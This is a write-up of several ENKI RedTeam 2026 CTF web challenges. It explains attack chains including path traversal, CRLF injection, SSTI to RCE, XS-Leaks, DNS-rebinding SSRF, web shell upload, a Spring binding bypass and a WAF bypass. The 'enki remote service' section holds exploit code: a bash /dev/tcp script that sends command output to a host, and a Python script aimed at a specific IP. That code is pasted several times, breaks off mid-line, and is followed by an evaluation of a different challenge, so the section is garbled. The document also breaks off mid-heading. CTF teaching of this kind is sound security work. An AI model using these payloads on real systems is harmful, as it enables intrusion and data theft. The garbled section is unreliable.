Presenting a write-up for the Jeopardy questions from the 2026 ENKI RedTeam CTF.
This content is designed around 8 questions including blog, boom, catllery, enki remote service, leakage, luck, partner contract portal, and sfa. It focuses on how to view and approach the questions from an attacker's perspective, going beyond simple answer sharing. For each question, it includes vulnerability identification, the author's intent, the solving process, and a comprehensive evaluation, allowing you not only to solve individual questions but also to understand the overall attack flow and mindset.
For those who have attempted the questions, it offers review and insights. For newcomers, it serves as a starting point for understanding the attacker's perspective.
blog
Welcome to ENKI Whitehat blog!!
Execute /readflag to get flag.
Vulnerability Classification
Path Traversal (Arbitrary File Read), CRLF Injection / HTTP Header Injection, nginx Internal Redirect, Server-Side Template Injection (SSTI)
Purpose of the Problem
The objective of this challenge is to evaluate the ability to construct an attack chain that leads to server configuration and source code exposure progressively, culminating in remote code execution (RCE) in a black box environment where the source code is not provided.
Identify File Download Vulnerability and Gather Information: Evaluate the ability to bypass server-side filtering limitations to perform arbitrary file reads and gather server configurations and source code.
Understand nginx Internal Operations: Determine whether you can access internal routing paths requiring authentication by understanding the behavior of nginx's Named Location and
X-Accel-Redirectheaders.Custom Template Engine SSTI Vulnerability: Analyze the filter system of a custom-implemented template engine to verify if arbitrary code execution is possible through context override.
Solution
1. Function Exploration and Vulnerability Identification
When connecting to the service in a black box environment, a blog-style website is available. Each post (/post/<id>) has a download link, allowing files to be downloaded through the /post/download?filename=... endpoint.
Testing the file download function reveals these characteristics:
Removing
../string replacements.Removing
..\\\\string replacements.
Additionally, if / is inserted at the beginning, it allows the top-level directory to be traversed, enabling file download attacks.
2. Collecting Server Information
Using this vulnerability, sequentially read the following files to understand the server's structure:
/home/app/.sh_history: Use command history to understand directory structure and service setup./etc/nginx/conf.d/default.confand/etc/nginx/default.conf.template: Check nginx configurations./app/backend/routes/*.py,/app/backend/framework/*.py: Obtain backend source code.
Upon analyzing the nginx configuration, the following structure can be found:
The
/auth/path requires passing Bearer token validation and an IP range check (10.231.3.x) to route to the internal Named Location (@admin).Since it’s not accessible by normal means, other vulnerabilities in the backend must be exploited to access the
@adminrouting.
3. nginx Internal Redirect via Header Injection
Analyzing the backend source code reveals that the user-supplied theme value from the /profile/theme endpoint is set directly with the set_cookie method.
Because validation of cookie_line values is missing, a CRLF Injection vulnerability occurs.
However, a 16-byte length limit is imposed on the theme parameter that needs to be bypassed.
Upon analyzing the get_one function, a bug in the recursive implementation is discovered that allows bypassing the check using an array parameter format like theme[][]. This makes injecting the X-Accel-Redirect header possible.
X-Accel-Redirect is an nginx internal redirect feature. If this header is included in the backend response, nginx changes the internal request to the specified Named Location, allowing access to @admin routing without token or IP verification.
4. Server-Side Template Injection (SSTI)
The service uses a custom template engine, rather than a template engine like Jinja. Of the endpoints using this engine, at /admin/announce, user input is used as an argument with little processing.
The critical vulnerability in the custom template engine is as follows:
A dictionary called
__filters__exists in the template context, where filter functions are defined.With insufficient validation and logic bugs in parameter binding, it is possible to overwrite the context's
__filters__.Filter expressions are internally executed with
eval().
By injecting a dictionary in the msg parameter, you can replace already defined safe filters with malicious expressions, enabling arbitrary code execution.
This payload uses Python's warnings.catch_warnings class to access __builtins__ and executes os.popen() to run the /readflag binary.
5. Exploit Execution
Combining these steps, the final exploit is as follows:
Upon execution, it retrieves the flag ENKI{cd47897817aacda9abef6dcbfcdf5bfc1a0c1f11d7affdb8dcf7d10916ba3353} from the output of /readflag.
Overall Evaluation
This problem is designed not to focus on discovering a single vulnerability but to evaluate the process of deducing the service's structure in a black box environment and chaining vulnerabilities to reach the final goal. Initially, configuration files and source code are secured through the file download feature, and subsequent analysis of internal routing and admin function approaches is required to progress.
The key intent lies in exploiting internal redirects with X-Accel-Redirect and, in the final stage, identifying implementation flaws in a custom template engine to connect SSTI to RCE. It emphasizes not just attacking simple vulnerabilities but also analyzing server configurations, application logic, and template engine code to combine vulnerabilities in a chain.
BOOM
Piece by piece
Vulnerability Classification
CRLF Injection, HTTP Response Splitting, XS-Leaks (Cross-Site Leaks)
Intent of the Problem
This problem is not about a single vulnerability, but it’s designed to assess the ability to construct an attack chain that extracts a flag by linking multiple web security techniques. Specifically, it verifies the following three core skills.
Advanced Use of CRLF Injection: Identifies CRLF Injection that occurs when user input is reflected in HTTP response headers and verifies if arbitrary HTTP headers can be inserted based on this.
Understanding of HTTP/1.1 Protocol: Uses the HTTP/1.1 specification, where
Transfer-Encoding: chunkedtakes precedence overContent-Length, to evaluate whether server-sideContent-Length: 0defenses can be bypassed.Side-Channel Attacks via XS-Leaks: Utilizes the Content-Security-Policy (CSP) report mechanism as an oracle to implement an attack technique that leaks the content of the response body one character at a time.
Solution
1. Analyze Server Structure
This problem consists of three components.
app (Python HTTP Server, Port 3000): Core application server
Apache Reverse Proxy: Proxy that enforces the CSP header (
default-src 'none')bot (Puppeteer): A bot that visits the attacker-specified path with the
FLAGcookie
The core logic of the app server is as follows.
The key points are as follows.
The value of the
qparameter is directly reflected in theContent-Typeheader.If the bot navigates directly (top-level navigation),
Content-Length: 0is set so the response body does not display.The response body includes the bot's
FLAGcookie value.
Additionally, the Apache proxy enforces Content-Security-Policy: default-src 'none', which limits typical XSS attacks.
2. Inserting Headers via CRLF Injection
By inserting \\r\\n (CRLF) characters into the q parameter, arbitrary HTTP headers can be added behind the Content-Type header. For example, sending a request like:
will include the following X-Custom header in the server response:
This CRLF Injection becomes the basis for subsequent attacks.
3. Bypassing Content-Length via HTTP/1.1 Transfer-Encoding
When the bot visits the page directly, Content-Length: 0 is set, so the response body (the flag) is not rendered by the browser. To bypass this, a significant specification of HTTP/1.1 is utilized.
According to RFC 7230, when
Transfer-EncodingandContent-Lengthare both present,Transfer-Encodingtakes precedence.
Therefore, by inserting a Transfer-Encoding: chunked header via CRLF Injection and including redirect HTML in the chunked encoded body, it achieves:
Passing this payload in the q parameter allows the bot's browser to ignore Content-Length: 0 and parse the chunked body, redirecting to the attacker's server.
4. XS-Leaks: Extracting Flags via CSP Reports as an Oracle
After guiding the bot to the attacker's server, the XS-Leaks technique extracts the flag character by character. The main principle is as follows:
Principle: The server response body contains the flag. Precise control of Content-Length through CRLF Injection allows the response body to be displayed only up to a certain trimmed length. By embedding the truncated body inside a <style> tag and specifying a SHA-256 hash of that content in the Content-Security-Policy-Report-Only header:
If the hash matches → No CSP violation occurs → No report is sent
If the hash does not match → CSP violation occurs → Report is sent to the attacker's server
This establishes an oracle of “candidate with no report sent = correct character”.
Attack Flow:
The key logic of the attacker server is as follows.
This function is called for each candidate character to generate probe URLs. As the bot loads these URLs sequentially, non-correct candidates send CSP reports to the attacker's server. The last candidate without a report becomes the correct character and is repeated to recover the entire flag.
Eventually, the flag ENKI{3f9ed664533c75baa86a1fe3009926de2099363} can be obtained.
Overall Assessment
This problem requires constructing a complex attack chain linking a relatively simple vulnerability like CRLF Injection with understanding HTTP protocol behavior and advanced side-channel techniques like XS-Leaks.
Catllery
Meow Meow Meow....
Vulnerability Classification
SSRF (Server-Side Request Forgery), DNS Rebinding
Purpose of the Question
This question is designed to assess your ability to identify the security blind spots in image optimization features offered by frontend frameworks and to perform SSRF attacks using the DNS Rebinding technique. Specifically, the following capabilities are evaluated:
Identifying SSRF Potential in Next.js Image Optimization Endpoint: Understand the mechanism by which the
/_next/imageendpoint retrieves images from external URLs on the server side, and verify if it can be used to access internal services.Bypassing Protections via DNS Rebinding: Assess whether the DNS Rebinding technique can be applied to bypass host verification or DNS-based protections.
Analyzing Internal API Structure and Circumventing Access Controls: Verify the ability to analyze the business logic and access control mechanisms of internal Flask services based on source code to derive bypass methods.
Solution
1. Understanding the Service Structure
Analyzing the provided source code reveals that this service operates under a dual structure as follows:
External Service (Next.js, Port 3000): The frontend web application exposed to users
Internal Service (Flask + Redis, Port 5000): The backend API accessible only at 127.0.0.1
Checking docker-compose.yml reveals that only port 3000 is exposed externally, and direct access to the internal Flask service is not possible. Insight from Next.js's middleware.ts and lib/internal.ts confirms that the frontend calls the internal API at http://127.0.0.1:5000 server-side.
2. Identifying Core Objectives
Analyzing the code of the internal Flask service (app.py) shows that the /internal/get-image endpoint is central.
This endpoint checks the requester's reservation seat information and returns an image containing the flag only to users who hold a VIP seat. However, using the VIP seat's ticket_no directly returns a 403 response.
The VIP seat is automatically generated during server initialization, and the ticket_no is stored in Redis with a TTL of 365 days. General seat reservations have a short TTL of 7 seconds.
What's important here is the operation of the lookup Lua script.
Due to the tonumber() comparison, even if the VIP's ticket_no is a very long number (365 digits), you can look up VIP seat reservations with another ticket_no that is identical in the early part, owing to Lua's floating-point precision limit. However, there's a more straightforward attack route — accessing the internal API through SSRF.
3. SSRF via Next.js Image Optimization Endpoint
Examining next.config.ts reveals the following configuration:
The hostname: "**" setting allows loading images from all hosts. Since the /_next/image endpoint in Next.js fetches images from the specified URL on the server side, it can be used as an SSRF vector.
However, Next.js performs basic validation on the url parameter. Direct requests to localhost or internal IP may be blocked, so DNS Rebinding is used to circumvent this.
4. Internal Access via DNS Rebinding
DNS Rebinding is a technique that manipulates DNS responses to make the same domain return an external IP on the first lookup and an internal IP (127.0.0.1) on the second.
Using rbndr.us, this can be implemented easily. The domain format is {externalIP hex}.{internalIP hex}.rbndr.us, and it returns one of the two IPs randomly at each lookup.
The hex representation of 127.0.0.1 is 7f000001, so you can construct the following URL:
The ticket_no=1e309 is used because this value represents a very large number in scientific notation, which allows it to be evaluated as equivalent to the VIP's long ticket_no in Lua's tonumber() comparison.
5. Execution of Exploit
Since DNS Rebinding works probabilistically, you send repeated requests until successful.
If the request is successful when DNS returns the internal IP, the image exclusively for VIP is downloaded. This image contains the flag ENKI{Th1s_1s_R34L_FL4G_XD}.
Overall Evaluation
This challenge demonstrates how the image optimization features offered by modern frontend frameworks like Next.js can be exploited as an SSRF vector. The DNS Rebinding technique remains a viable threat in network isolation-reliant architectures, underlining the necessity of multilayered defenses like strictly limiting remotePatterns settings and implementing server-side DNS pinning. It highlights the importance of verifying that no unintended internal network access paths exist when separating internal and external services in practical environments.
enki remote service
enki remote service
Vulnerability Classification
Arbitrary File Upload (WebShell), Command Injection (CVE-2026-1731)
Intent of the Problem
This problem is set to evaluate if a candidate can identify vulnerabilities by analyzing the communication between a server and an agent (client) in a black box environment where the source code is not provided, and further assess if the RCE vulnerability on the agent client can be exploited to affect the VM in the isolated environment.
Solution
1. Understanding the Service Structure
Upon accessing the provided URL, there is a button to create an instance, which generates an isolated web server and agent server. The web server, based on PHP, connects to the linked agents at the /_agent endpoint to send commands and receive the results. The agent server provides an agent that is connected to the web server but blocked from making any external server connections.
One flag is stored on each the web server and agent server; to get the final flag, both must be exploited.
2. Obtaining the Web Server Shell
Once an agent is registered, a screenshot function can be requested, and the screenshot file is saved at the path workspace/<agent_name>.<ext>. By analyzing the agent, it is revealed that when uploading a screenshot, a mime type such as image/png is sent, and the server splits by / to directly use the extension. Thus, a web shell can easily be obtained by uploading the screenshot with image/php.
The flag is located at /flag.txt and participants can access the web server's source code.
3. Obtaining the Agent Server Shell
The agent runs from wrapper.sh and restarts each time it is terminated. Upon restart, it sets environment variables by reading the poll_interval_ms key from the ./agent-registration.json file, making RCE possible similarly to CVE-2026-1731 by inserting $() into the [[ ... ]] comparison statement.
The agent has a file-writing feature that can overwrite the agent-registration.json file.
To crash the agent, send an invalid command code (e.g., 0).
Therefore, the exploit can be structured as follows:
Read
/app/enki-data/agents.jsonto check for agent access_code, id, etc.Construct commands to insert into
/app/enki-data/agents.jsonas follows
Because the agent server has its outbound connection blocked, one can create and execute a shell script that sends the HTTP request with the result to the web server as /dev/tcp/{ip}/{port}. Use ${IFS} to adapt syntactically since spaces are removed within comparison commands. 1. Write command-containing content into agent-registration.json 2. Write a non-existing command type to cause a crash, executing commands thusly
<" >&2; exit 1;}} H={host!r}; P={port}; A={agent_id!r}; C={command_id}; U={path!r} M=$1; AL=${{#A}}; ML=${{#M}}; B=$((1+2+AL+8+1+2+ML)) put8(){{ printf '%b' "\\\\x$(printf '%02x' "$1")" >&3;}} put16(){{ put8 "$((($1>>8)&255))"; put8 "$(($1&255))";}} put64(){{ for i in 56 48 40 32 24 16 8 0; do put8 "$(( (C>>i)&255 ))"; done;}} exec 3>
The final exploit code is as follows:
<" >&2; exit 1;}} H={host!r}; P={port}; A={agent_id!r}; C={command_id}; U={path!r} M=$1; AL=${{#A}}; ML=${{#M}}; B=$((1+2+AL+8+1+2+ML)) put8(){{ printf '%b' "\\\\x$(printf '%02x' "$1")" >&3;}} put16(){{ put8 "$((($1>>8)&255))"; put8 "$(($1&255))";}} put64(){{ for i in 56 48 40 32 24 16 8 0; do put8 "$(( (C>>i)&255 ))"; done;}} exec 3<>/dev/tcp/"$H"/"$P" printf "POST %s HTTP/1.1\\\\r\\\\nHost: %s:%s\\\\r\\\\nContent-Type: application/octet-stream\\\\r\\\\nContent-Length: %s\\\\r\\\\n\\\\r\\\\n" "$U" "$H" "$P" "$B" >&3 put8 3; put16 "$AL" >&3; printf '%s' "$A" >&3; put64 >&3; put8 0; put16 "$ML" >&3; printf '%s' "$M" >&3 exec 3>&- ''' def do_raw(base_url: str, body: bytes) -> tuple[int, bytes]: resp = s.post( base_url.rstrip("/") + "/_agent", data=body, headers={"Content-Type": "application/octet-stream"}, timeout=20, ) raw = resp.content if resp.status_code >= 400: if len(raw) >= 1 and raw[0] == RES_ERROR: off = [1] raise RuntimeError(f"server error:{read_str(raw, off)}") raise RuntimeError(f"request failed{resp.status_code}") if len(raw) < 1: return RES_NO_CONTENT, b"" return int(raw[0]), raw[1:] def register(base_url: str, name: str) -> tuple[str, str, int]: code, payload = do_raw(base_url, build_register(name)) if code == RES_ERROR: raise RuntimeError("registration failed") if code != RES_OK or not payload: raise RuntimeError("invalid register response") off = [0] agent_id = read_str(payload, off) access_code = read_str(payload, off) poll_ms = struct.unpack_from(">I", payload, off[0])[0] if off[0] + 4 <= len(payload) else 2000 return agent_id, access_code, poll_ms def pull_command(base_url: str, agent_id: str) -> tuple[int, int, int, int, str, str] | None: code, payload = do_raw(base_url, build_pull(agent_id)) if code == RES_ERROR: raise RuntimeError("pull failed") if code == RES_NO_CONTENT or not payload: return None off = [0] if off[0] + 8 > len(payload): return None (cmd_id,) = struct.unpack_from(">Q", payload, off[0]) off[0] += 8 if off[0] >= len(payload): return None opcode = payload[off[0]] off[0] += 1 if off[0] + 8 > len(payload): return None x, y = struct.unpack_from(">ii", payload, off[0]) off[0] += 8 return (cmd_id, opcode, x, y, read_str(payload, off), read_str(payload, off)) def upload_screenshot(base_url: str, agent_id: str, command_id: int, mime: str, image_bytes: bytes) -> None: body = build_screenshot(agent_id, command_id, mime, base64.b64encode(image_bytes)) if do_raw(base_url, body)[0] == RES_ERROR: raise RuntimeError("screenshot upload failed") def pend(i: int, typ: str, cmd: str = "", keys: str = "", err: str = "") -> dict: return {"id": i, "type": typ, "x": 0, "y": 0, "cmd": cmd, "keys": keys, "status": "pending", "error": err, "created_at": ""} def push_agents(sh, key: str, agent: dict) -> None: b64 = base64.b64encode(json.dumps({key: agent}).encode()).decode() sh(f"echo '{b64}' | base64 -d > /app/enki-data/agents.json") def run_attack() -> None: global s s = requests.Session() r = s.post("http://15.165.103.134/api/instances").json() web_url = r["web_url"].rstrip("/") print(f"[*] Instance:{r['id']}, web_url:{web_url}") agent_id, access_code, _ = register(web_url, "../../../../../../app/enki/workspace/paw") print(f"[*] Registered: agent_id={agent_id}, access_code={access_code}") q = s.post( f"{web_url}/?code={access_code}", data={"action": "request_screenshot", "code": access_code}, headers={"Content-Type": "application/x-www-form-urlencoded"}, timeout=10, allow_redirects=True, ) print( "[*] Screenshot queued." if q.status_code == 200 and "Screenshot command queued" in q.text else f"[!] Queue failed:{q.status_code}" ) mini = b">
Overall Assessment
This problem focuses more on business logic vulnerabilities (such as account takeover via email swap) than on technical vulnerabilities (like Path Traversal or CAPTCHA bypass). It is a real-world-like problem demonstrating that a single logical flaw, such as the lack of authorization checks in email change APIs, can compromise the entire authentication system, even with 2FA (OTP) and client-side encryption (AES-GCM) implemented. The lesson emphasized is not to solely rely on encrypted communication or MFA for security, but to ensure thorough authorization checks on the business logic of each API.
This problem uses cases encountered in the field to provide participants with useful insights, such as the following:
Even web hackers should be able to perform reversing with tools like IDA MCP when given a client
Shell acquisition should be possible through appropriate guessing
Stay current with the latest issues, such as CVE-2026-1731
The ability to exfiltrate data from a server with no external communication and no utility tools is required, which is suitable for practicality tests in hiring CTF challenges, offering solutions for field-adapted learnings.
&2; exit 1;}} H={host!r}; P={port}; A={agent_id!r}; C={command_id}; U={path!r} M=$1; AL=${{#A}}; ML=${{#M}}; B=$((1+2+AL+8+1+2+ML)) put8(){{ printf '%b' "\\\\x$(printf '%02x' "$1")" >&3;}} put16(){{ put8 "$((($1>>8)&255))"; put8 "$(($1&255))";}} put64(){{ for i in 56 48 40 32 24 16 8 0; do put8 "$(( (C>>i)&255 ))"; done;}} exec 3<>/dev/tcp/"$H"/"$P" printf "POST %s HTTP/1.1\\\\r\\\\nHost: %s:%s\\\\r\\\\nContent-Type: application/octet-stream\\\\r\\\\nContent-Length: %s\\\\r\\\\n\\\\r\\\\n" "$U" "$H" "$P" "$B" >&3 put8 3; put16 "$AL" >&3; printf '%s' "$A" >&3; put64 >&3; put8 0; put16 "$ML" >&3; printf '%s' "$M" >&3 exec 3>&- ''' def do_raw(base_url: str, body: bytes) -> tuple[int, bytes]: resp = s.post( base_url.rstrip("/") + "/_agent", data=body, headers={"Content-Type": "application/octet-stream"}, timeout=20, ) raw = resp.content if resp.status_code >= 400: if len(raw) >= 1 and raw[0] == RES_ERROR: off = [1] raise RuntimeError(f"server error:{read_str(raw, off)}") raise RuntimeError(f"request failed{resp.status_code}") if len(raw) < 1: return RES_NO_CONTENT, b"" return int(raw[0]), raw[1:] def register(base_url: str, name: str) -> tuple[str, str, int]: code, payload = do_raw(base_url, build_register(name)) if code == RES_ERROR: raise RuntimeError("registration failed") if code != RES_OK or not payload: raise RuntimeError("invalid register response") off = [0] agent_id = read_str(payload, off) access_code = read_str(payload, off) poll_ms = struct.unpack_from(">I", payload, off[0])[0] if off[0] + 4 <= len(payload) else 2000 return agent_id, access_code, poll_ms def pull_command(base_url: str, agent_id: str) -> tuple[int, int, int, int, str, str] | None: code, payload = do_raw(base_url, build_pull(agent_id)) if code == RES_ERROR: raise RuntimeError("pull failed") if code == RES_NO_CONTENT or not payload: return None off = [0] if off[0] + 8 > len(payload): return None (cmd_id,) = struct.unpack_from(">Q", payload, off[0]) off[0] += 8 if off[0] >= len(payload): return None opcode = payload[off[0]] off[0] += 1 if off[0] + 8 > len(payload): return None x, y = struct.unpack_from(">ii", payload, off[0]) off[0] += 8 return (cmd_id, opcode, x, y, read_str(payload, off), read_str(payload, off)) def upload_screenshot(base_url: str, agent_id: str, command_id: int, mime: str, image_bytes: bytes) -> None: body = build_screenshot(agent_id, command_id, mime, base64.b64encode(image_bytes)) if do_raw(base_url, body)[0] == RES_ERROR: raise RuntimeError("screenshot upload failed") def pend(i: int, typ: str, cmd: str = "", keys: str = "", err: str = "") -> dict: return {"id": i, "type": typ, "x": 0, "y": 0, "cmd": cmd, "keys": keys, "status": "pending", "error": err, "created_at": ""} def push_agents(sh, key: str, agent: dict) -> None: b64 = base64.b64encode(json.dumps({key: agent}).encode()).decode() sh(f"echo '{b64}' | base64 -d > /app/enki-data/agents.json") def run_attack() -> None: global s s = requests.Session() r = s.post("http://15.165.103.134/api/instances").json() web_url = r["web_url"].rstrip("/") print(f"[*] Instance:{r['id']}, web_url:{web_url}") agent_id, access_code, _ = register(web_url, "../../../../../../app/enki/workspace/paw") print(f"[*] Registered: agent_id={agent_id}, access_code={access_code}") q = s.post( f"{web_url}/?code={access_code}", data={"action": "request_screenshot", "code": access_code}, headers={"Content-Type": "application/x-www-form-urlencoded"}, timeout=10, allow_redirects=True, ) print( "[*] Screenshot queued." if q.status_code == 200 and "Screenshot command queued" in q.text else f"[!] Queue failed:{q.status_code}" ) mini = b">&2; exit 1;}} H={host!r}; P={port}; A={agent_id!r}; C={command_id}; U={path!r} M=$1; AL=${{#A}}; ML=${{#M}}; B=$((1+2+AL+8+1+2+ML)) put8(){{ printf '%b' "\\\\x$(printf '%02x' "$1")" >&3;}} put16(){{ put8 "$((($1>>8)&255))"; put8 "$(($1&255))";}} put64(){{ for i in 56 48 40 32 24 16 8 0; do put8 "$(( (C>>i)&255 ))"; done;}} exec 3>
leakage
Vulnerability Classification
HTML Injection, Cross-Site Request Forgery (CSRF), Spring Data Binding Bypass (CVE-2025-22233), Unicode Decoding Trick
Exam Intent
This problem is designed to assess the ability to construct a multi-step vulnerability chain in a Spring Boot-based web application. It verifies the process of bypassing multiple security mechanisms step-by-step to reach the final goal (obtaining administrator privileges), rather than a simple single-vulnerability attack.
JavaScript Code Injection: Identify if client-side code can be executed through the username reflected in
console.log().HTML Injection + CSRF Combination: Evaluate whether a CSRF attack can be performed by sending a profile update request with the bot's (administrator's) privileges using HTML Injection in the memo feature.
CVE-2025-22233 and Unicode-Based Filter Bypass: Verify the ability to apply advanced techniques to bypass both Spring's
setDisallowedFieldsprotection and server-side string filtering simultaneously.
Solution
1. Understanding the Service Structure
By analyzing the provided source code, the following configuration can be confirmed.
Spring Boot Web Application (Port 8080): Provides features for user registration, profile management, and memo creation/viewing
Bot Service (Puppeteer, Port 3000): Logs in with an administrator account and visits a user-specified memo path
The bot logs in with an administrator account to view memos, making it a target for CSRF attacks.
2. Discovering the JavaScript Code Injection Path
When accessing the /profile page, the user's name is output in console.log(). If the username contains " (double quotes), it is inserted without escaping, allowing for JavaScript code injection.
However, the username is limited to 20 characters, making direct attack payload insertion difficult. It needs to be combined with other features for effective use.
Set the username as follows.
When this name is inserted into console.log("...");, the following code is executed.
top.a.submit() submits a form in the parent frame with id=a.
3. Constructing CSRF via HTML Injection
HTML Injection is possible in child memos within the memo feature. This can be used to construct an HTML form for CSRF attacks.
The operation of this structure is as follows.
When the bot views the child memo, the HTML form and iframe are rendered.
As the iframe loads
/profile/{userid}, code injection is executed in the profile page'sconsole.log().top.a.submit()is called, and the<form id=a>in the parent frame is submitted.A profile update request is sent with the administrator session, changing the permission field (
isPerm).
4. CVE-2025-22233 — Bypassing Spring setDisallowedFields
When updating the profile, the permission field isPerm is protected by Spring's binder.setDisallowedFields("isPerm"), generally blocking binding.
CVE-2025-22233 exploits a case-handling inconsistency vulnerability in the field name matching logic of setDisallowedFields. By using İsPerm (Turkish capital I: İ, U+0130) with the first letter capitalized, the setDisallowedFields check is bypassed while Spring's property binding correctly maps it to the isPerm field.
5. Bypassing Filters with Byte Casts
Even if the value of the isPerm field is updated, additional filtering is performed on the server side.
If the admin string is directly included, it is removed by the filter. To bypass this, Spring's UriUtils.decode() (before Spring 6.2.9) can be leveraged for its byte overflow behavior.
UriUtils.decode() internally uses ByteArrayOutputStream.write(int b), which casts the input to byte. When Java's char (16-bit) is converted to a byte (8-bit), only the lower byte remains.
The mapping taking advantage of this characteristic is as follows.
Input Character | Code Point | Lower Byte | Decoding Result |
|---|---|---|---|
| U+2661 | 0x61 |
|
| U+2664 | 0x64 |
|
| U+266D | 0x6D |
|
| U+2669 | 0x69 |
|
| U+266E | 0x6E |
|
Thus, inputting ♡♤♭♩♮ passes through the replaceAll filter and then is converted into admin by UriUtils.decode(). Note that unless the payload contains the % character, UriUtils.decode() does not perform decoding (if the changed flag is false), so %20 is added to ensure decoding is executed.
6. Executing the Exploit
The automated exploit for the above process is as follows.
After obtaining administrator privileges, set the Host header to localhost or 127.0.0.1 to access the /admin/flag endpoint and receive the flag ENKI{48869ff73110ac17ccf68fe88f1e5f40f3f2d86fb2127f142444c2b3f2d36856}.
Overall Evaluation
This problem is a high-difficulty task requiring the organic connection of four techniques: HTML Injection, CSRF, Spring Data Binding Bypass (CVE-2025-22233), and Unicode Decoding Trick. Particularly, the filter bypass using Java's byte casting demonstrates the danger of encoding-related vulnerabilities that can easily be overlooked in practice, and the fact that Spring framework security mechanisms (setDisallowedFields) can be bypassed through CVEs underscores the importance of security updates for the framework.
luck
For problem-solving, please connect to the following platform, authenticate with a token, and receive an instance.
Create Instance: http://portal.luck.rctf.enki.co.kr/
Vulnerability Classification
WAF Bypass, Path Traversal, SSRF (Server-Side Request Forgery), Side-Channel Attack (/proc/self/io)
Purpose of the Problem
This problem was designed to comprehensively evaluate the ability to construct a multi-stage complex attack chain, spanning from WAF (Web Application Firewall) bypass to binary reversing and side-channel attacks, in a black box environment where source code is not provided.
WAF Bypass Techniques: Evaluate the ability to bypass parameter checks through large requests by analyzing partial inspection mode and cache mechanisms.
Exploiting File Download Vulnerabilities: Verify if it is possible to leak server source code and internal binaries through Path Traversal to obtain additional attack surfaces.
Side-Channel Attack: In scenarios where direct output is blocked, verify the ability to implement advanced techniques to extract flags one character at a time by observing changes in the
wcharvalues of/proc/self/io.
Solution
1. Exploring Service Features
When accessing the service in a black box environment, a service in the form of an in-house bulletin board that allows login with the guest/guest123 account is provided. The main features are as follows:
Bulletin Board (
/board): View list of posts, view individual posts, and download attachmentsFile Download (
/board/download): Download files usingFileNameorFileIDparametersTool Collection (
/tools): Calculator (/api/calc), QR Code Generator (/api/qr), Link Preview (/api/link-preview)Memo (
/memo): Write and view memosBack-Office Terminal (
/back-office-terminal.html): TCP connection to back-office services with a web terminal UI
2. Stage 1 — Path Traversal through WAF Bypass
There is a Path Traversal vulnerability in the file download feature (/board/download?FileName=), but the server-side filter only removes patterns ./ and .u00005C, without blocking ../. However, the WAF detects and blocks ../ patterns.
Analyzing the WAF's operation reveals the following characteristics:
Stores combinations of
IP:URIof requests that pass inspection in cache (TTL approx. 2000ms)Blocks large requests (>4MB) without cache
If cache exists, switches to partial inspection mode: Inspects parameters only up to the inspection budget (4MB) and skips the rest
The procedure for WAF bypass using these characteristics is as follows:
Send a legitimate request to
/board/downloadto warm the WAF cache.Within the cache TTL (2000ms), send a POST request of more than 4MB. Place padding parameters larger than 4MB at the front, followed by the
FileNameparameter.The WAF enters partial inspection mode due to cache hit and consumes the inspection budget with the padding.
Once the budget is consumed, the
../pattern in theFileNameparameter located behind is not inspected and passes through.
On the server side, ...// is converted to ../ by removing ./, succeeding Path Traversal through double encoding technique. Cache warming and attack requests are executed in parallel to increase success rate.
Through /proc/self/fd/4, you can download the web server's source code (JAR file).
3. Gathering Internal Information
Analyzing the obtained source code reveals that internal network requests (SSRF) via /api/link-preview and directory listing via the /api/test endpoint are possible.
Leverage Path Traversal to collect additional files.
/home/chall/.bash_history: Server environment information (back-office binary path, etc.)/opt/backoffice/back-office_3ab1542105c9b5aa758c35407db2bfe8: Back-office Rust binary/opt/backoffice/Dockerfile: Confirm that the flag file is located at/app/flag.txt
4. Stage 2 — Reversing the Back-Office Binary
Reversing the downloaded back-office binary (written in Rust) reveals the following actions:
The key constraint is that lines containing the flag (ENKI{...}) are redirected to /dev/null and cannot be read directly. To bypass this, perform a Side-Channel Attack.
5. Stage 3 — Extract Flag via Side-Channel Attack
The amount of data written to /dev/null can be indirectly observed through the wchar (written characters) value of /proc/self/io. If a pattern matches the flag, the line is written to /dev/null, changing the wchar increment. Use this as an oracle.
Attack Algorithm:
Measure Baseline: Execute a blank pattern (
"") N times (70 times) and measure thewcharchanges to set a threshold (approx. 3000).Filter Valid Characters: Test each character that might be in the flag alone; retain only those whose
wcharchanges exceed the threshold.Brute-Force Each Character: Attach candidate characters to the current prefix (
ENKI{+ confirmed character) and test each. Ifwcharchanges exceed the threshold, that character is correct.Repeat until the
}character is found.
Apply parallel processing to test candidate characters at each position simultaneously, improving attack speed. Ultimately, you can obtain the flag ENKI{h3110_and_wE1C0ME_EnK1}.
Comprehensive Evaluation
This problem is a high-difficulty challenge requiring mastery of WAF Bypass, Path Traversal, binary reversing, and Side-Channel Attacks in succession. The WAF bypass technique leveraging partial inspection mode is an excellent example of exploiting performance constraints of real security devices for attacks, and the Side-Channel Attack using /proc/self/io demonstrates extracting information in environments where direct data leaks are blocked. From a defense perspective, it suggests strengthening input validation at the application level instead of relying solely on WAF.
Partner Contract Portal
We have opened a secure partner contract portal for partner agreements.
Please connect to the following platform and authenticate the token to receive an instance for solving this problem.
Create instance: http://portal.partner.rctf.enki.co.kr/
Classification of Vulnerabilities
CAPTCHA Bypass, IDOR (Insecure Direct Object Reference), Business Logic Vulnerability (Account Hijacking through Email Swap), Encryption Logic Analysis, Path Traversal
Intended Problem
This problem was designed to evaluate the ability to detect and exploit common business logic vulnerabilities in a real-world-like black box environment where source code is not provided, and to escalate usage to misuse such vulnerabilities to hijack an account with the highest privileges.
Business Logic Analysis: Identify logical flaws in email changing and password reset flow within an OTP multi-step authentication and encrypted communication environment.
Client-side Encryption Analysis: Analyze and reproduce the AES-GCM encryption logic implemented on frontend to evaluate if security API requests can be accurately composed.
Stepwise Privilege Escalation: Verify whether it is possible to construct a privilege escalation chain from general user → internal staff privilege (internal_ops) → internal admin privilege (internal_admin).
Solution
This problem comprises a total of 11 sequential attack steps. Each step is described in detail.
STEP 1. Registration
Upon accessing the service, a partner contract portal is provided. First, proceed with registration. The password must include uppercase, lowercase, special characters, numbers, and be longer than 10 characters.
During registration, you must pass CAPTCHA (puzzle type authentication). The CAPTCHA is solved automatically by parsing the slot location in the SVG image, where pieces are slid into the correct position.
Once registration is completed, JWT token, OTP registration key, user ID, company ID, and user key seed are returned.
STEP 2. OTP Registration
Register the issued OTP secret key with a TOTP algorithm. OTP will be required for all subsequent authentication processes.
STEP 3. Gathering internal_ops Privilege Account Information
In the response of the /api/notices API, the author's userId and companyId are exposed, allowing collection of identification information for the internal staff (internal_ops) account.
STEP 4. Hijacking the internal_ops Account via Email Swap
